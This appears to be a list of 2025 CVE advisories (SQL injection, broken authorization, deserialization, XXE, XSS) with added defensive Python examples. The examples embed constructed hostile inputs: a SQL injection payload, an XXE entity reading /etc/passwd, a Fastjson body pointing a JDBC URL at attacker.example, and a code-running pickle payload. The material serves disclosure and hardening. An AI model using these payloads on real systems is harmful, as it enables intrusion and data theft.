
[CVE-2025-61167] [Modified: 01-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] SIGB PMB v8.0.1.14 was discovered to contain multiple SQL injection vulnerabilities in the /opac_css/ajax_selector.php component via the id and datas parameters.
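The SQL injection above is the classic pattern of a request parameter spliced into query text. The following is an added example, not PMB's own code: a constructed SQLite table stands in for the OPAC lookup, `lookup_vulnerable` interpolates the `id` parameter the way an injectable selector does, and `lookup_safe` validates the parameter and binds it, so the same payload that dumps every row from the first function cannot reach the SQL engine through the second.

```python
import sqlite3


def make_db():
    """Constructed sample data; the table and rows are illustrative, not PMB's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE records (id INTEGER PRIMARY KEY, title TEXT, restricted INTEGER)"
    )
    conn.executemany(
        "INSERT INTO records VALUES (?, ?, ?)",
        [
            (1, "Public catalogue entry", 0),
            (2, "Staff-only acquisition note", 1),
            (3, "Reserved stock list", 1),
        ],
    )
    return conn


def lookup_vulnerable(conn, record_id):
    """The request parameter becomes part of the SQL text: the injection sink."""
    sql = f"SELECT id, title FROM records WHERE id = {record_id} AND restricted = 0"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, record_id):
    """Validate the type, then bind the value; it can never be parsed as SQL."""
    if not str(record_id).isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM records WHERE id = ? AND restricted = 0"
    return conn.execute(sql, (int(record_id),)).fetchall()


# Constructed payload: closes the comparison, adds a tautology and comments out the
# restricted=0 guard, so the vulnerable query returns every row.
PAYLOAD = "1 OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:", lookup_vulnerable(db, "1"))
    print("vulnerable, payload:  ", lookup_vulnerable(db, PAYLOAD))
    print("safe, normal id:      ", lookup_safe(db, "1"))
    try:
        lookup_safe(db, PAYLOAD)
    except ValueError as exc:
        print("safe, payload rejected:", exc)
```

The same fix applies to the `datas` parameter: every value that arrives from the request is bound, never concatenated, and anything that must be an identifier or keyword (table or column names, sort direction) is matched against an allowlist instead.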

[CVE-2025-61168] [Modified: 01-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue in the cms_rest.php component of SIGB PMB v8.0.1.14 allows attackers to execute arbitrary code via unserializing an arbitrary file.

[CVE-2025-64063] [Modified: 01-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] Primakon Pi Portal 1.0.18 API endpoints fail to enforce sufficient authorization checks when processing requests. A standard user can exploit this flaw by sending direct HTTP requests to administrative endpoints, bypassing the UI restrictions, and manipulate data outside their assigned scope, including: unauthorized account modification, modifying or deleting arbitrary user accounts and changing passwords through a direct request to the user management API endpoint; confidential data access, reading and downloading sensitive organizational documents through a direct request to the document retrieval API; and privilege escalation by manipulating core system functions. This can lead to complete compromise of data integrity and confidentiality.

[CVE-2025-64064] [Modified: 01-12-2025] [Analyzed] [V3.1 S8.8:HIGH] The Primakon Pi Portal 1.0.18 /api/v2/pp_users endpoint fails to adequately check user permissions before processing a PATCH request that modifies PP_SECURITY_PROFILE_ID. Because of the weak access control, any low-privileged user can call this API with PP_SECURITY_PROFILE_ID=2 in the request body, change their own security profile to Administrator, and escalate privileges.

[CVE-2025-64065] [Modified: 01-12-2025] [Analyzed] [V3.1 S8.8:HIGH] The Primakon Pi Portal 1.0.18 API /api/V2/pp_udfv_admin endpoint fails to perform the necessary server-side validation. The administrative LoginAs (user impersonation) feature is vulnerable to an access control failure: any authenticated low-privileged user can send a direct PATCH request and impersonate any other user, including application Administrators. This is a Broken Function Level Authorization failure (the function does not check the caller's privilege) compounded by an insecure design that permits a session switch without the target user's password or an administrative token; only the target user's email address is needed.

[CVE-2025-64067] [Modified: 01-12-2025] [Analyzed] [V3.1 S5.3:MEDIUM] Primakon Pi Portal 1.0.18 API endpoints responsible for retrieving object-specific or filtered data (e.g., user profiles, project records) fail to implement sufficient server-side validation to confirm that the requesting user is authorized to access the requested object or dataset. This vulnerability can be exploited in two ways. Direct ID manipulation (IDOR): by changing an ID parameter (e.g., user_id, project_id) in the request, an attacker can access objects and data belonging to another user. Filter omission: by omitting the filtering parameter entirely, an attacker can make the endpoint return the entire unfiltered dataset of all stored records for all users. This flaw leads to the unauthorized exposure of sensitive personal and organizational information.
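The four Pi Portal entries above are one root cause seen from four endpoints: the server trusts the request to say who may do what. The following is an added example, not Primakon's code, of the server-side checks that close all four: a function-level check on the privileged field (PP_SECURITY_PROFILE_ID) and on the impersonation function, an object-level check on the target account, and a list endpoint whose scope is derived from the session so that omitting the filter narrows rather than widens the result. The user and document records, the `Portal` class and the assumption that profile id 2 is Administrator (as the CVE-2025-64064 text states) are all constructed for the example.

```python
from dataclasses import dataclass

ADMIN_PROFILE = 2  # assumption taken from the advisory: profile id 2 is Administrator
USER_PROFILE = 1


@dataclass
class User:
    id: int
    email: str
    profile_id: int


@dataclass
class Document:
    id: int
    owner_id: int
    title: str


class AuthorizationError(Exception):
    pass


class Portal:
    """Minimal stand-in for the portal's API layer; data below is constructed."""

    def __init__(self):
        self.users = {
            1: User(1, "admin@example.test", ADMIN_PROFILE),
            2: User(2, "alice@example.test", USER_PROFILE),
            3: User(3, "bob@example.test", USER_PROFILE),
        }
        self.documents = {
            10: Document(10, 2, "alice-expenses.pdf"),
            11: Document(11, 3, "bob-contract.pdf"),
            12: Document(12, 1, "board-minutes.pdf"),
        }

    def _is_admin(self, actor_id):
        # Privilege is read from the server-side session record, never from the request body.
        return self.users[actor_id].profile_id == ADMIN_PROFILE

    def patch_user(self, actor_id, target_id, changes):
        """PATCH on a user: object-level check on the target, function-level check on privileged fields."""
        if target_id != actor_id and not self._is_admin(actor_id):
            raise AuthorizationError("cannot modify another user's account")
        if "profile_id" in changes and not self._is_admin(actor_id):
            raise AuthorizationError("only administrators may change a security profile")
        target = self.users[target_id]
        for field_name, value in changes.items():
            if field_name not in ("email", "profile_id"):
                raise ValueError(f"unknown or non-writable field: {field_name}")
            setattr(target, field_name, value)
        return target

    def list_documents(self, actor_id, owner_id=None):
        """GET on documents: the filter defaults to the caller, and widening it needs admin rights."""
        if owner_id is None:
            owner_id = actor_id  # an omitted filter must not mean 'everything'
        if owner_id != actor_id and not self._is_admin(actor_id):
            raise AuthorizationError("cannot read another user's documents")
        return [d for d in self.documents.values() if d.owner_id == owner_id]

    def login_as(self, actor_id, target_email):
        """Impersonation is an administrative function; the caller's privilege is checked here, not in the UI."""
        if not self._is_admin(actor_id):
            raise AuthorizationError("impersonation requires administrator privileges")
        for user in self.users.values():
            if user.email == target_email:
                return user.id
        raise KeyError(target_email)


def denied(call):
    """True when the call is refused by an authorization check (used by the demo below)."""
    try:
        call()
    except AuthorizationError:
        return True
    return False


if __name__ == "__main__":
    portal = Portal()
    print("alice -> own profile to admin denied:", denied(lambda: portal.patch_user(2, 2, {"profile_id": 2})))
    print("alice -> LoginAs admin denied:       ", denied(lambda: portal.login_as(2, "admin@example.test")))
    print("alice, no filter:", [d.title for d in portal.list_documents(2)])
```

The UI never appears in these checks, which is the point: every decision is taken from the authenticated session and the server's own record of the target object, so a direct request carries no more authority than a click.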

[CVE-2025-65960] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.6:MEDIUM] Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, back end users with precise control over the contents of template closures can execute arbitrary PHP functions that do not have required parameters. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves manually patching the Contao\Template::once() method.

[CVE-2025-65961] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.3:LOW] Contao is an Open Source CMS. From version 4.0.0 to before 4.13.57, before 5.3.42, and before 5.6.5, it is possible to inject code into the template output that will be executed in the browser in the front end and back end. This issue has been patched in versions 4.13.57, 5.3.42, and 5.6.5. A workaround for this issue involves not using the affected templates or patching them manually.

[CVE-2025-12816] [Modified: 02-01-2026] [Analyzed] [V3.1 S8.6:HIGH] An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.
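An ASN.1 "interpretation conflict" arises when two parsers accept the same bytes but disagree on where a value ends or what it contains, typically because one tolerates BER-style encodings that DER forbids. The advisory does not say which encoding node-forge mishandles, so the following is an added, generic example rather than a description of the bug: a strict DER TLV reader that rejects indefinite lengths, non-minimal length encodings, values that overrun their container, and trailing bytes after the outermost SEQUENCE. The sample encodings are constructed for the example and are not taken from node-forge.

```python
def read_tlv(buf, pos=0):
    """Read one DER TLV at buf[pos:]; return (tag, value, next_pos). Single-byte tags only."""
    if pos >= len(buf):
        raise ValueError("truncated: no tag")
    tag = buf[pos]
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tags are out of scope for this example")
    pos += 1
    if pos >= len(buf):
        raise ValueError("truncated: no length")
    first = buf[pos]
    pos += 1
    if first < 0x80:
        length = first                      # short form
    elif first == 0x80:
        raise ValueError("indefinite length is BER, not DER")
    else:
        n = first & 0x7F                    # long form: n length bytes follow
        if n > 4:
            raise ValueError("length field too long")
        if pos + n > len(buf):
            raise ValueError("truncated length field")
        length_bytes = buf[pos:pos + n]
        pos += n
        if length_bytes[0] == 0:
            raise ValueError("non-minimal length: leading zero byte")
        length = int.from_bytes(length_bytes, "big")
        if length < 0x80:
            raise ValueError("non-minimal length: short form was required")
    if pos + length > len(buf):
        raise ValueError("value overruns its container")
    return tag, buf[pos:pos + length], pos + length


def parse_sequence_strict(buf):
    """Parse a top-level SEQUENCE into (tag, value) children; every byte must be consumed exactly once."""
    tag, value, end = read_tlv(buf)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    if end != len(buf):
        raise ValueError(f"{len(buf) - end} trailing byte(s) after SEQUENCE")
    children = []
    pos = 0
    while pos < len(value):
        child_tag, child_value, pos = read_tlv(value, pos)
        children.append((child_tag, child_value))
    return children


def is_valid_der_sequence(buf):
    try:
        parse_sequence_strict(buf)
        return True
    except ValueError:
        return False


# Constructed encodings: SEQUENCE { INTEGER 1, INTEGER 2 } in canonical DER and three malformed variants.
GOOD = bytes.fromhex("30 06 02 01 01 02 01 02")
TRAILING = GOOD + b"\x00"                                  # extra byte a lax parser would ignore
NON_MINIMAL = bytes.fromhex("30 81 06 02 01 01 02 01 02")  # long-form length for a value < 128
INDEFINITE = bytes.fromhex("30 80 02 01 01 02 01 02 00 00")

if __name__ == "__main__":
    print(parse_sequence_strict(GOOD))
    for name, sample in [("trailing", TRAILING), ("non-minimal", NON_MINIMAL), ("indefinite", INDEFINITE)]:
        print(name, "accepted" if is_valid_der_sequence(sample) else "rejected")
```

The security argument is that a signature check and the schema check that follows it must see identical bytes with identical boundaries; a parser that silently accepts any of the three malformed samples can be steered to a different interpretation than the verifier it is paired with.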

[CVE-2025-51742] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /material/getMaterialEnableSerialNumberList endpoint passes the search query parameter directly to parseObject(), introducing a Fastjson deserialization vulnerability that can lead to RCE via JDBC payloads.

[CVE-2025-65647] [Modified: 01-12-2025] [Analyzed] [V3.1 S4.3:MEDIUM] Insecure Direct Object Reference (IDOR) in the Track order function in PHPGURUKUL Online Shopping Portal 2.1 allows information disclosure via the oid parameter.

[CVE-2025-51741] [Modified: 30-12-2025] [Analyzed] [V3.1 S7.5:HIGH] An issue was discovered in Veal98 Echo Open-Source Community System 2.2 through 2.3 allowing an unauthenticated attacker to cause the server to send email verification messages to arbitrary users via the /sendEmailCodeForResetPwd endpoint, potentially causing a denial of service to the server or the downstream users.

[CVE-2025-51743] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /materialCategory/addMaterialCategory endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51744] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /user/addUser endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51745] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /role/addcan endpoint is vulnerable to fastjson deserialization attacks.

[CVE-2025-51746] [Modified: 02-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An issue was discovered in jishenghua JSH_ERP 2.3.1. The /serialNumber/addSerialNumber endpoint is vulnerable to fastjson deserialization attacks.
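The five JSH_ERP entries share one sink: request JSON handed to Fastjson's parseObject() with autoType reachable, where a `@type` key selects the class to instantiate and a JDBC URL in a property can complete the chain. Until the affected endpoints are patched, a practical interim control is to flag such bodies at the edge. The following is an added example, not JSH_ERP's code or a vendor signature: a walker that reports `@type` keys at any depth and string values that look like JDBC URLs, run over a few constructed request-log records (paths taken from the advisories, payload classes and hosts invented).

```python
import json


def find_indicators(node, path="$"):
    """Recursively collect (json_path, reason) pairs for Fastjson autoType indicators."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "@type":
                hits.append((child, f"fastjson type hint {value!r}"))
            hits.extend(find_indicators(value, child))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_indicators(value, f"{path}[{i}]"))
    elif isinstance(node, str) and node.lower().startswith("jdbc:"):
        hits.append((path, f"JDBC URL in value {node!r}"))
    return hits


def scan_request_log(lines):
    """Each line is a JSON record with 'path' and a JSON-encoded 'body' and/or 'query' string."""
    alerts = []
    for line in lines:
        record = json.loads(line)
        for field_name in ("body", "query"):
            raw = record.get(field_name)
            if not raw:
                continue
            try:
                payload = json.loads(raw)
            except json.JSONDecodeError:
                continue  # not JSON, so not a Fastjson parse target
            hits = find_indicators(payload)
            if hits:
                alerts.append({"path": record["path"], "field": field_name, "hits": hits})
    return alerts


# Constructed log records; class names and hosts are placeholders, not real gadgets.
SAMPLE_LOG = [json.dumps(r) for r in [
    {"path": "/user/addUser",
     "body": json.dumps({"username": "clerk01", "roleId": 3})},
    {"path": "/role/addcan",
     "body": json.dumps({"@type": "com.example.Gadget",
                         "url": "jdbc:mysql://attacker.example/db"})},
    {"path": "/material/getMaterialEnableSerialNumberList",
     "query": json.dumps({"category": {"@type": "com.example.Gadget"}})},
]]

if __name__ == "__main__":
    for alert in scan_request_log(SAMPLE_LOG):
        print(alert["path"], alert["field"], alert["hits"])
```

A `@type` key is not proof of an attack, since some legitimate clients emit it, but on endpoints that expect plain records it is rare enough to alert on; the durable fix remains parsing with autoType disabled and a fixed target class.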

[CVE-2025-58360] [Modified: 12-12-2025] [Analyzed] [V3.1 S8.2:HIGH] GeoServer is an open source server that allows users to share and edit geospatial data. From version 2.26.0 to before 2.26.2 and before 2.25.6, an XML External Entity (XXE) vulnerability was identified. The application accepts XML input through a specific endpoint /geoserver/wms operation GetMap. However, this input is not sufficiently sanitized or restricted, allowing an attacker to define external entities within the XML request. This issue has been patched in GeoServer 2.25.6, GeoServer 2.26.3, and GeoServer 2.27.0.
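XXE in a GetMap request means the XML carried in the request (for WMS, typically an SLD body) reaches a parser that honours entity declarations. The hardening is the same regardless of the XML library: refuse DOCTYPE entirely on endpoints that have no business declaring entities, and never resolve external entities. The following is an added example, not GeoServer's code, using Python's standard expat binding; the two SLD-shaped documents are constructed for the example and the file path in the malicious one is just the usual illustration.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    pass


def parse_without_entities(data: bytes):
    """Parse XML and return the element names seen, refusing any DOCTYPE and any external entity."""
    parser = expat.ParserCreate()
    # Never process parameter entities (external DTD subsets) even if a DOCTYPE slipped through.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    elements = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Raising here aborts the parse before any <!ENTITY ...> declaration is processed,
        # which also shuts the door on internal-entity expansion attacks.
        raise UnsafeXML("DOCTYPE declarations are not accepted on this endpoint")

    def refuse_external_entity(context, base, system_id, public_id):
        return 0  # tell expat the entity could not be loaded; it reports an error instead

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = refuse_external_entity
    parser.StartElementHandler = lambda name, attrs: elements.append(name)
    parser.Parse(data, True)
    return elements


def is_accepted(data: bytes) -> bool:
    try:
        parse_without_entities(data)
        return True
    except (UnsafeXML, expat.ExpatError):
        return False


# Constructed inputs: a harmless SLD fragment and one carrying an external entity.
CONSTRUCTED_SLD = (
    b'<?xml version="1.0"?>'
    b'<StyledLayerDescriptor version="1.0.0"><NamedLayer><Name>roads</Name></NamedLayer>'
    b"</StyledLayerDescriptor>"
)
CONSTRUCTED_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE sld [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<StyledLayerDescriptor><NamedLayer><Name>&xxe;</Name></NamedLayer></StyledLayerDescriptor>"
)

if __name__ == "__main__":
    print("benign:", parse_without_entities(CONSTRUCTED_SLD))
    print("xxe accepted:", is_accepted(CONSTRUCTED_XXE))
```

Rejecting DOCTYPE outright is stricter than disabling external entities alone, but for a request-bound document like SLD_BODY it costs nothing and removes the whole class, including entity-expansion denial of service.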

[CVE-2025-21621] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.25.0, a reflected cross-site scripting (XSS) vulnerability exists in the WMS GetFeatureInfo HTML output format that enables a remote attacker to execute arbitrary JavaScript code in a victim's browser through specially crafted SLD_BODY parameters. This issue has been patched in version 2.25.0.

[CVE-2025-62703] [Modified: 30-12-2025] [Analyzed] [V3.1 S8.8:HIGH] Fugue is a unified interface for distributed computing that lets users execute Python, Pandas, and SQL code on Spark, Dask, and Ray with minimal rewrites. In version 0.9.2 and prior, there is a remote code execution vulnerability by pickle deserialization via FlaskRPCServer. The Fugue framework implements an RPC server system for distributed computing operations. In the core functionality of the RPC server implementation, I found that the _decode() function in fugue/rpc/flask.py directly uses cloudpickle.loads() to deserialize data without any sanitization. This creates a remote code execution vulnerability when malicious pickle data is processed by the RPC server. The vulnerability exists in the RPC communication mechanism where the client can send arbitrary serialized Python objects that will be deserialized on the server side, allowing attackers to execute arbitrary code on the victim's machine. This issue has been patched via commit 6f25326.
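The Fugue entry above and the PMB cms_rest.php entry earlier (CVE-2025-61168) are the same failure in two runtimes: a native deserializer fed attacker-controlled bytes will construct whatever objects the bytes name, and object construction can run code. The following is an added example, not Fugue's or PMB's code, using the standard library `pickle` (the Fugue text names cloudpickle.loads; the loader behaviour shown here is the same). A constructed payload records a side effect through `__reduce__` instead of running a command; `decode_vulnerable` runs it, while `decode_restricted` refuses any class not on an allowlist.

```python
import io
import pickle

SIDE_EFFECTS = []


def attacker_callback(message):
    """Stand-in for os.system or subprocess: only records that it was called."""
    SIDE_EFFECTS.append(message)
    return message


class MaliciousPayload:
    # __reduce__ tells the unpickler to rebuild this object by calling attacker_callback(...),
    # so merely loading the bytes executes the call.
    def __reduce__(self):
        return (attacker_callback, ("code ran during unpickling",))


def build_payload():
    """Constructed hostile message as an RPC client could send it."""
    return pickle.dumps(MaliciousPayload())


def decode_vulnerable(data):
    """The pattern the advisory describes: untrusted bytes straight into the loader."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    # Only these (module, name) pairs may be resolved; plain dicts, lists, strings and
    # numbers never go through find_class, so they still load.
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def decode_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    try:
        decode_restricted(data)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    payload = build_payload()
    decode_vulnerable(payload)
    print("vulnerable loader side effects:", SIDE_EFFECTS)
    print("restricted loader rejects payload:", is_rejected(payload))
    print("restricted loader accepts plain data:",
          decode_restricted(pickle.dumps({"job": "sum", "args": [1, 2]})))
```

An allowlisting unpickler is a mitigation for code that must keep speaking pickle; where the protocol can change, a schema-checked format such as JSON with explicit field types removes the deserialization gadget surface entirely, which is the equivalent of replacing PHP's unserialize() on attacker-reachable input with json_decode().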

[CVE-2025-63735] [Modified: 09-01-2026] [Analyzed] [V3.1 S6.1:MEDIUM] A reflected cross-site scripting (XSS) vulnerability exists in Ruckus Unleashed 200.13.6.1.319 via the name parameter of the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp.